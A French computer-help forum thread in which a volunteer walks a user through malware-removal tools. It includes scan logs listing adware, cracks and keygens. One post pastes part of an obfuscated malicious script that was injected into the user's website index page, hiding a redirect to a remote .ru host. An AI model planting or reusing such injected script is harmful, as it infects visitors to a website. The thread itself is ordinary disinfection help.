    WebBrowser-{D4027C7F-154A-4066-A1AD-4243D8127440} - (no file)

    **************************************************************************

    catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2010-01-18 18:53
    Windows 5.1.2600 Service Pack 3 NTFS

    Recherche de processus cachés ...

    Recherche d'éléments en démarrage automatique cachés ...

    Recherche de fichiers cachés ...

    Scan terminé avec succès
    Fichiers cachés: 0

    **************************************************************************

    [HKEY_LOCAL_MACHINE\System\ControlSet001\Services\EverestDriver]
    "ImagePath"="\??\c:\program files\Lavalys\EVEREST Ultimate Edition\kerneld.wnt"
    .
    --------------------- CLES DE REGISTRE BLOQUEES ---------------------

    [HKEY_USERS\S-1-5-21-1174329838-3057196234-353638615-1005\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{694430CC-0D06-6CFA-6CB0-1E20C07C4D2D}*]
    @Allowed: (Read) (RestrictedCode)
    @Allowed: (Read) (RestrictedCode)
    "abpdnnhgidjpkhigmmefdmhaionhagohoc"=hex:69,61,66,6c,62,68,65,61,65,64,68,61,
    61,6d,64,6f,67,67,00,00
    "pajehlljlohejjoakgapklfbbpahheih"=hex:6a,61,6c,6b,6e,6a,61,6d,69,6b,64,69,6d,
    6b,6b,6e,66,6f,6e,62,00,f2

    [HKEY_USERS\S-1-5-21-1174329838-3057196234-353638615-1005\Software\SecuROM\!CAUTION! NEVER A OR CHANGE ANY KEY*]
    "??"=hex:11,96,81,aa,d2,bd,46,9c,05,4b,7b,13,11,5e,7f,bf,b7,1b,19,44,c0,37,70,
    6f,b3,47,99,f5,f6,0e,b8,71,68,bf,52,cd,72,82,25,43,e4,c2,c1,e0,8b,94,a7,8e,\
    "??"=hex:75,85,08,97,11,e0,b2,b1,c4,08,b3,80,20,dd,bf,fa

    [HKEY_USERS\S-1-5-21-1174329838-3057196234-353638615-1005\Software\SecuROM\License information*]
    "datasecu"=hex:fe,6a,fd,6f,e2,dd,b1,8f,25,c9,54,e7,f5,f7,2f,4a,08,52,dc,30,61,
    12,3d,fb,c7,fb,e8,9c,c5,6b,25,f9,c6,99,1d,e4,d9,39,18,6e,d8,8a,fe,8c,86,27,\
    "rkeysecu"=hex:38,97,98,27,f8,7b,be,84,b0,22,9e,a5,4a,9c,9a,b3
    .
    --------------------- DLLs chargées dans les processus actifs ---------------------

    - - - - - - - > 'winlogon.exe'(1388)
    c:\windows\system32\Ati2evxx.dll
    .
    Heure de fin: 2010-01-18 18:55:20
    ComboFix-quarantined-files.txt 2010-01-18 17:55

    Avant-CF: 147 803 791 360 octets libres
    Après-CF: 147 869 343 744 octets libres

    - - End Of File - - 2A23C55AF69BDC4BFC731C0FD76B10B7
    0
    1. Utilisateur anonyme
       
      Bonsoir

      • Télécharge Ad-remover ( de C_XX ) sur ton bureau :

      http://pagesperso-orange.fr/NosTools/C_XX/AD-R.exe

      ! Déconnecte toi et ferme toutes applications en cours !

      • Double clique ou clic droit (exécuter en tant que admin…sur Vista) sur "Ad-R.exe" pour lancer l'installation et laisse les paramètres d'installation par défaut.

      • Double-clique ou clic droit (exécuter en tant que admin…sur Vista) sur le raccourci Ad-remover qui est sur ton bureau pour lancer l'outil .

      • Au menu principal choisis l'option "S" et sur [entrée] .

      • Laisse travailler l'outil et ne touche à rien ...

      --> Poste le rapport qui apparaît à la fin , sur le forum ...

      ( Le rapport est sauvegardé aussi sous C:\Ad-report.log )
      ( CTRL+A Pour tout sélectionner , CTRL+C pour copier et CTRL+V pour coller )

      Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus (AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool.
      Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
      Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...) d'où l'alerte émise par ces antivirus.

      Aides en images (Installation) : http://pagesperso-orange.fr/NosTools/tuto_ad_r1.html
      Aides en images (Recherche) : http://pagesperso-orange.fr/NosTools/tuto_ad_r2.html

      @+
      0
  7. furfande
     
    Bon, écoute, je crois savoir d'ou vient le problème ...
    Le site sur lequel je choppe le virus est un site sur lequel je suis administrateur, je sais pas comment mais l'index.html a choppé un autorépliquant, étant sous IE (JE SAIS, HONTE A MOI) je l'ai choppé et pas les autres.

    Si quelqu'un peut confirmer que ceci est bien un virus :
    <script>/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s()&@$o$()s!^o^(.&($!c^&o^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c($)^$o(m!&!.(e!!&a##!#s^&y!$l)i&@&f#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n@@!^g(@&o@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@g)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c@@(t)r@@i$@(p@).&^c^@o()$m(/!!g^^o#)(@o(g^l#e$$.!!@c)^))o^#@@#m$/$('.replace(/\!|\^|\
    ETC ... c'est assez long.
    Un virus compréssé ? En tout cas il infecte chaque page, peut on confirmer ? Merci de votre aide.

    Mon PC semble Clean en tout cas maintenant,merci Guillaume5188.
    0
    1. Utilisateur anonyme
       
      Re

      Fait le post 7 stp ;merci

      Désolé ;mais concernant ce script;je ne peux pas t'aider.

      @+
      0
  8. furfande
     
    Resultat de AD remover : .
    ======= RAPPORT D'AD-REMOVER 1.1.4.6_H | UNIQUEMENT XP/VISTA/7 =======
    .
    Mis à jour par C_XX le 18.01.2010 à 18:32
    Contact: AdRemover.contact@gmail.com
    Site web: http://pagesperso-orange.fr/NosTools/ad_remover.html
    .
    Lancé à: 21:53:53, 18/01/2010 | Mode Normal | Option: SCAN
    Exécuté de: C:\Ad-Remover\
    Système d'exploitation: Microsoft® Windows XP™ Service Pack 3 v5.1.2600
    Nom du PC: THIBAUT | Utilisateur actuel: thibaut
    .
    ============== ÉLÉMENT(S) TROUVÉ(S) ==============
    .

    C:\DOCUME~1\thibaut\APPLIC~1\Mozilla\FireFox\Profiles\feiz23oz.default\searchplugins\ask.xml
    C:\DOCUME~1\thibaut\APPLIC~1\Mozilla\FireFox\Profiles\feiz23oz.default\searchplugins\askcom.xml
    C:\Program Files\Mozilla FireFox\Components\AskSearch.js
    .
    HKCU\software\microsoft\internet explorer\searchscopes\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E}
    HKCU\software\microsoft\internet explorer\searchscopes\{CF739809-1C6C-47C0-85B9-569DBB141420}
    HKLM\Software\Classes\AppID\{9B0CB95C-933A-4B8C-B6D4-EDCD19A43874}
    HKLM\software\classes\appid\GenericAskToolbar.DLL
    HKLM\software\classes\GenericAskToolbar.ToolbarWnd
    HKLM\software\classes\GenericAskToolbar.ToolbarWnd.1
    HKLM\Software\Classes\Interface\{91CF619A-4686-4CA4-9232-3B2E6B63AA92}
    HKLM\Software\Classes\Interface\{AC71B60E-94C9-4EDE-BA46-E146747BB67E}
    HKLM\Software\Classes\Interface\{DB885111-F39F-4D88-9EE5-C88460B6DF7B}
    HKLM\Software\Classes\Interface\{FFB96CC1-7EB3-449D-B827-DB661701C6BB}
    .
    ============== Scan additionnel ==============
    .
    .
    * Mozilla FireFox Version 3.0.12 [fr] *
    .
    Nom du profil: feiz23oz.default (thibaut)
    .
    (thibaut, prefs.js) Browser.download.dir, C:\Documents and Settings\thibaut\Mes documents
    (thibaut, prefs.js) Browser.search.defaultenginename, Ask
    (thibaut, prefs.js) Browser.search.selectedEngine, Ask
    (thibaut, prefs.js) Browser.startup.homepage, hxxp://www.ask.com/?o=13928&l=dis
    (thibaut, prefs.js) Extensions.enabledItems, {bb6bc1bb-f824-4702-90cd-35e2fb24f25c}:0.2.1.3,DTToolbar@toolbarnet.com:1.0.7.0088,{b9db16a4-6edc-47ec-a1f4-b86292ed211d}:4.6.4,{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}:1.1.8,fdm_ffext@freedownloadmanager.org:1.3.4,{e4a8a97b-f2ed-450b-b12d-ee082ba24781}:0.8.20090123.1,{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBA}:6.0.16,jqs@sun.com:1.0,{20a82645-c095-46ed-80e3-08825760534b}:1.1,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.12
    (thibaut, prefs.js) Keyword.URL, hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q=
    .
    (thibaut, prefs.js) TROUVE - Browser.search.defaultengine, Ask.com
    (thibaut, prefs.js) TROUVE - Browser.startup.homepage, hxxp://www.ask.com/?o=13928&l=dis
    (thibaut, prefs.js) TROUVE - Extensions.snipit.chromeURL, hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q={searchTerms}&crm=1
    (thibaut, prefs.js) TROUVE - Extensions.snipit.history_query, deezer=ASKURL=hxxp://www.ask.com/web?q=deezer&qsrc=2871&o=13925&l=dis||deezer=ASKURL=//www.ask.com/web?q=deezer&qsrc=2871&o=13925&l=dis
    (thibaut, prefs.js) TROUVE - Keyword.URL, hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q=
    .
    .
    .
    * Internet Explorer Version 8.0.6001.18702 *
    .
    [HKEY_CURRENT_USER\..\Internet Explorer\Main]
    .
    Do404Search: 01000000
    Local Page: C:\WINDOWS\system32\blank.htm
    Show_ToolBar: yes
    Start Page: hxxp://go.microsoft.com/fwlink/?LinkId=69157
    Search Page: hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    Use Search Asst: no
    Enable Browser Extensions: yes
    Start Page Redirect Cache: hxxp://fr.msn.com/?ocid=iehp
    Start Page Redirect Cache_TIMESTAMP: ca32a4bf4795ca01
    Start Page Redirect Cache AcceptLangs: fr
    .
    [HKEY_LOCAL_MACHINE\..\Internet Explorer\Main]
    .
    Default_Page_URL: hxxp://go.microsoft.com/fwlink/?LinkId=69157
    Default_Search_URL: hxxp://go.microsoft.com/fwlink/?LinkId=54896
    Search Page: hxxp://go.microsoft.com/fwlink/?LinkId=54896
    Delete_Temp_Files_On_Exit: yes
    Local Page: C:\WINDOWS\system32\blank.htm
    Start Page: hxxp://www.msn.com/
    .
    [HKEY_LOCAL_MACHINE\..\Internet Explorer\ABOUTURLS]
    .
    Tabs: res://ieframe.dll/tabswelcome.htm
    .
    ============== Suspect (Cracks, Serials, ...) ==============
    .
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\EN_160_161_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\COH_EN_140_150_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\COH_EN_171_2101_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\EN_151_160_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\EN_161_170_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\EN_170_171_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\uTorrent\Adobe Photoshop CS4 Extended Keygen & Patch.rar.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\Call of Duty - Modern Warfare 2 - Spec-Ops - LAN CRACK - nVidia840.rar.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\GTA IV crack + patch 1.0.3.0.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\Patch fr cod6.torrent
    C:\Documents and Settings\thibaut\Bureau\Jeux\keygen 145 jeux EA games.rar
    C:\Documents and Settings\thibaut\Favoris\C.O.P The recruit Patcher compatible TOUS linker enfin Nintendo DS.url
    C:\Documents and Settings\thibaut\Favoris\Call of Duty Modern Warfare 2 + Crack + Patch FR [2009] PC.url
    C:\Documents and Settings\thibaut\Favoris\CSmania.RU ???????? ???? - [Crack] UnDeadPatch v6.66 Beta Devil Edition - SASiO.url
    C:\Documents and Settings\thibaut\Favoris\downloads\http--patch-fr.com-forum-world-conflict-t11.html.url
    C:\Documents and Settings\thibaut\Mes documents\My Games\Command & Conquer Generals\keygen.exe
    C:\Documents and Settings\thibaut\Mes documents\My Games\My Games\Command & Conquer Generals\keygen.exe
    .
    ===================================
    .
    6154 Octet(s) - C:\Ad-Report-SCAN[1].log
    .
    59 Fichier(s) - C:\DOCUME~1\thibaut\LOCALS~1\Temp
    8 Fichier(s) - C:\WINDOWS\Temp
    129 Fichier(s) - C:\WINDOWS\Prefetch
    .
    2 Fichier(s) - C:\Ad-Remover\BACKUP
    0 Fichier(s) - C:\Ad-Remover\QUARANTINE
    .
    Fin à: 21:59:03 | 18/01/2010 - SCAN[1]
    .
    ============== E.O.F ==============
    .
    0
    1. Utilisateur anonyme
       
      Bonsoir

      1)• Relance Ad-remover,
      • Au menu principal choisis l'option "L" et tape sur [entrée] .

      • Laisse travailler l'outil et ne touche à rien ...

      --> Poste le rapport qui apparait à la fin , sur le forum ...

      ( Le rapport est sauvegardé sous C:\Ad-report-clean.log )

      ( CTRL+A Pour tout sélectionner , CTRL+C pour copier et CTRL+V pour coller )

      2)Télécharge Malwarebytes anti malware ici
      http://www.malwarebytes.org/mbam.php

      * Installe le (choisis bien "français" ; ne modifie pas les paramètres d'installe ) et mets le à jour .

      (NB : S'il te manque "COMCTL32.OCX" lors de l'installe, alors télécharge le ici : https://www.malekal.com/tutorial-aboutbuster/

      * Potasse le tuto pour te familiariser avec le prg :

      https://forum.pcastuces.com/sujet.asp?f=31&s=3

      (cela dis, il est très simple d’utilisation).

      relance malwarebytes en suivant scrupuleusement ces consignes :

      ! Déconnecte toi et ferme toutes applications en cours !

      * Lance Malwarebyte's .

      Fais un examen dit "Complet" .

      --> Laisse le programme travailler ( et ne rien faire d'autre avec le PC durant le scan ).
      --> à la fin tu cliques sur "résultat" .
      --> Vérifie que tous les objets infectés soient validés, puis clique sur " suppression " .

      Note : si il faut redémarrer ton PC pour finir le nettoyage, fais le !


      Poste le rapport sauvegardé après la suppression des objets infectés (dans l'onglet "rapport/log"de Malwarebytes, le dernier en date)


      Poste les rapports au fur et à mesure ;merci

      @+
      0
  9. furfande
     
    .Pour MBAM, comme je l'avais déjà, il detecte plus rien vu que je l'ai lancé pas mal de fois.

    ======= RAPPORT D'AD-REMOVER 1.1.4.6_H | UNIQUEMENT XP/VISTA/7 =======
    .
    Mis à jour par C_XX le 18.01.2010 à 18:32
    Contact: AdRemover.contact@gmail.com
    Site web: http://pagesperso-orange.fr/NosTools/ad_remover.html
    .
    Lancé à: 17:46:33, 21/01/2010 | Mode Normal | Option: CLEAN
    Exécuté de: C:\Ad-Remover\
    Système d'exploitation: Microsoft® Windows XP™ Service Pack 3 v5.1.2600
    Nom du PC: THIBAUT | Utilisateur actuel: thibaut
    .
    ============== ÉLÉMENT(S) NEUTRALISÉ(S) ==============
    .

    C:\DOCUME~1\thibaut\APPLIC~1\Mozilla\FireFox\Profiles\feiz23oz.default\searchplugins\ask.xml
    C:\DOCUME~1\thibaut\APPLIC~1\Mozilla\FireFox\Profiles\feiz23oz.default\searchplugins\askcom.xml
    C:\Program Files\Mozilla FireFox\Components\AskSearch.js

    (!) -- Fichiers temporaires supprimés.

    .
    HKCU\software\microsoft\internet explorer\searchscopes\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E}
    HKCU\software\microsoft\internet explorer\searchscopes\{CF739809-1C6C-47C0-85B9-569DBB141420}
    HKLM\Software\Classes\AppID\{9B0CB95C-933A-4B8C-B6D4-EDCD19A43874}
    HKLM\software\classes\appid\GenericAskToolbar.DLL
    HKLM\software\classes\GenericAskToolbar.ToolbarWnd
    HKLM\software\classes\GenericAskToolbar.ToolbarWnd.1
    HKLM\Software\Classes\Interface\{91CF619A-4686-4CA4-9232-3B2E6B63AA92}
    HKLM\Software\Classes\Interface\{AC71B60E-94C9-4EDE-BA46-E146747BB67E}
    HKLM\Software\Classes\Interface\{DB885111-F39F-4D88-9EE5-C88460B6DF7B}
    HKLM\Software\Classes\Interface\{FFB96CC1-7EB3-449D-B827-DB661701C6BB}
    .
    ============== Scan additionnel ==============
    .
    .
    * Mozilla FireFox Version 3.0.12 [fr] *
    .
    Nom du profil: feiz23oz.default (thibaut)
    .
    (thibaut, prefs.js) Browser.download.dir, C:\Documents and Settings\thibaut\Mes documents
    (thibaut, prefs.js) Browser.search.defaultenginename, Ask
    (thibaut, prefs.js) Browser.search.selectedEngine, Ask
    (thibaut, prefs.js) Browser.startup.homepage, hxxp://www.ask.com/?o=13928&l=dis
    (thibaut, prefs.js) Extensions.enabledItems, {bb6bc1bb-f824-4702-90cd-35e2fb24f25c}:0.2.1.3,DTToolbar@toolbarnet.com:1.0.7.0088,{b9db16a4-6edc-47ec-a1f4-b86292ed211d}:4.6.4,{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}:1.1.8,fdm_ffext@freedownloadmanager.org:1.3.4,{e4a8a97b-f2ed-450b-b12d-ee082ba24781}:0.8.20090123.1,{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBA}:6.0.16,jqs@sun.com:1.0,{20a82645-c095-46ed-80e3-08825760534b}:1.1,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.12
    (thibaut, prefs.js) Keyword.URL, hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q=
    .
    (thibaut, prefs.js) EFFACE - Browser.search.defaultengine, Ask.com
    (thibaut, prefs.js) EFFACE - Browser.startup.homepage, hxxp://www.ask.com/?o=13928&l=dis
    (thibaut, prefs.js) EFFACE - Extensions.snipit.chromeURL, hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q={searchTerms}&crm=1
    (thibaut, prefs.js) EFFACE - Extensions.snipit.history_query, deezer=ASKURL=hxxp://www.ask.com/web?q=deezer&qsrc=2871&o=13925&l=dis||deezer=ASKURL=//www.ask.com/web?q=deezer&qsrc=2871&o=13925&l=dis
    (thibaut, prefs.js) EFFACE - Keyword.URL, hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q=
    .
    .
    .
    * Internet Explorer Version 8.0.6001.18702 *
    .
    [HKEY_CURRENT_USER\..\Internet Explorer\Main]
    .
    Do404Search: 01000000
    Local Page: C:\WINDOWS\system32\blank.htm
    Show_ToolBar: yes
    Start Page: hxxp://fr.msn.com/
    Use Search Asst: no
    Enable Browser Extensions: yes
    Start Page Redirect Cache: hxxp://fr.msn.com/?ocid=iehp
    Start Page Redirect Cache_TIMESTAMP: ca32a4bf4795ca01
    Start Page Redirect Cache AcceptLangs: fr
    Default_search_url: hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    Default_page_url: hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
    Search bar: hxxp://go.microsoft.com/fwlink/?linkid=54896
    .
    [HKEY_LOCAL_MACHINE\..\Internet Explorer\Main]
    .
    Default_Page_URL: hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
    Default_Search_URL: hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    Search Page: hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    Delete_Temp_Files_On_Exit: yes
    Local Page: C:\WINDOWS\system32\blank.htm
    Start Page: hxxp://fr.msn.com/
    Search bar: hxxp://search.msn.com/spbasic.htm
    .
    [HKEY_LOCAL_MACHINE\..\Internet Explorer\ABOUTURLS]
    .
    Tabs: res://ieframe.dll/tabswelcome.htm
    .
    ============== Suspect (Cracks, Serials, ...) ==============
    .
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\EN_160_161_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\COH_EN_140_150_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\COH_EN_171_2101_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\EN_151_160_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\EN_161_170_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\Raptr\downloads\metadata\EN_170_171_Patch.exe
    C:\Documents and Settings\thibaut\Application Data\uTorrent\Adobe Photoshop CS4 Extended Keygen & Patch.rar.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\Call of Duty - Modern Warfare 2 - Spec-Ops - LAN CRACK - nVidia840.rar.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\GTA IV crack + patch 1.0.3.0.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\NDS pokemon coeur d'or et ame d'argent+PATCH.1.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\NDS pokemon coeur d'or et ame d'argent+PATCH.torrent
    C:\Documents and Settings\thibaut\Application Data\uTorrent\Patch fr cod6.torrent
    C:\Documents and Settings\thibaut\Bureau\Jeux\keygen 145 jeux EA games.rar
    C:\Documents and Settings\thibaut\Favoris\C.O.P The recruit Patcher compatible TOUS linker enfin Nintendo DS.url
    C:\Documents and Settings\thibaut\Favoris\Call of Duty Modern Warfare 2 + Crack + Patch FR [2009] PC.url
    C:\Documents and Settings\thibaut\Favoris\CSmania.RU ???????? ???? - [Crack] UnDeadPatch v6.66 Beta Devil Edition - SASiO.url
    C:\Documents and Settings\thibaut\Favoris\downloads\http--patch-fr.com-forum-world-conflict-t11.html.url
    C:\Documents and Settings\thibaut\Mes documents\My Games\Command & Conquer Generals\keygen.exe
    C:\Documents and Settings\thibaut\Mes documents\My Games\My Games\Command & Conquer Generals\keygen.exe
    .
    ===================================
    .
    6425 Octet(s) - C:\Ad-Report-CLEAN[1].log
    6491 Octet(s) - C:\Ad-Report-SCAN[1].log
    .
    85 Fichier(s) - C:\DOCUME~1\thibaut\LOCALS~1\Temp
    13 Fichier(s) - C:\WINDOWS\Temp
    8 Fichier(s) - C:\WINDOWS\Prefetch
    .
    19 Fichier(s) - C:\Ad-Remover\BACKUP
    3 Fichier(s) - C:\Ad-Remover\QUARANTINE
    .
    Fin à: 17:52:07 | 21/01/2010 - CLEAN[1]
    .
    ============== E.O.F ==============
    .
    0
  10. Utilisateur anonyme
     
    Bonsoir

    Je te propose de changer d'antivirus.

    Télécharge : http://www.commentcamarche.net/telecharger/telechargement-55-antivir sur ton
    bureau.
    --> Installe Antivir et mets-le à jour.

    --> Double-clique sur l'icône d'AntiVir (Parapluie) dans la barre des tâches.

    --> Dans AntiVir, choisis Outils puis Configuration .

    --> Coche Mode Expert et coche Rech. Rootkit au dém. de la recherche à droite dans Autres réglages puis valide.

    --> Fais un scan complet, clique sur Tout réparer si AntiVir trouve quelque chose et poste le rapport.
    Tutoriel sur AntiVir.
    Pourquoi changer ? Avast-Antivir

    Comment installer et utiliser AntiVir :
    http://www.libellules.ch/tuto_antivir.php

    Configuration de Antivir (Merci Nico) :

    clic droit sur son icône dans la barre des taches et séléctionner Configurer Antivir.

    Cocher la case : Mode Expert.

    => Cliquer sur Scanner dans le volet de gauche :

    > Dans "Fichiers" sélectionner Tous les fichiers.

    > Dans procédure de recherche, cocher Autoriser l'arrêt, et dans "priorité scanner" sélectionner Elevé.

    > Dans "Autres réglages" cocher toutes les cases.

    NE SURTOUT PAS OUBLIER LA RECHERCHE DES ROOTKIT QUI EST TRES IMPORTANTE !

    => Cliquer sur "Recherche" dans le volet de gauche et appliquer les mêmes paramètres que précédemment.

    => Dérouler "Recherche" en cliquant sur le +. Cliquer sur "Heuristique" :

    > Cocher "Heuristique de MacroVirus" et "Heuristique fichier Win32" avec degré d'indentification ELEVE !

    => Dans le volet de gauche, dérouler "Guard" puis dérouler "Recherche" :

    > Cocher "Heuristique de MacroVirus" et "Heuristique fichier Win32" avec degré d'identification ELEVE !

    Désinstalle Avast avant installation d'Antivir.
    Passe cet utilitaire pour supprimer les fichiers récalcitrants d'Avast

    @+
    0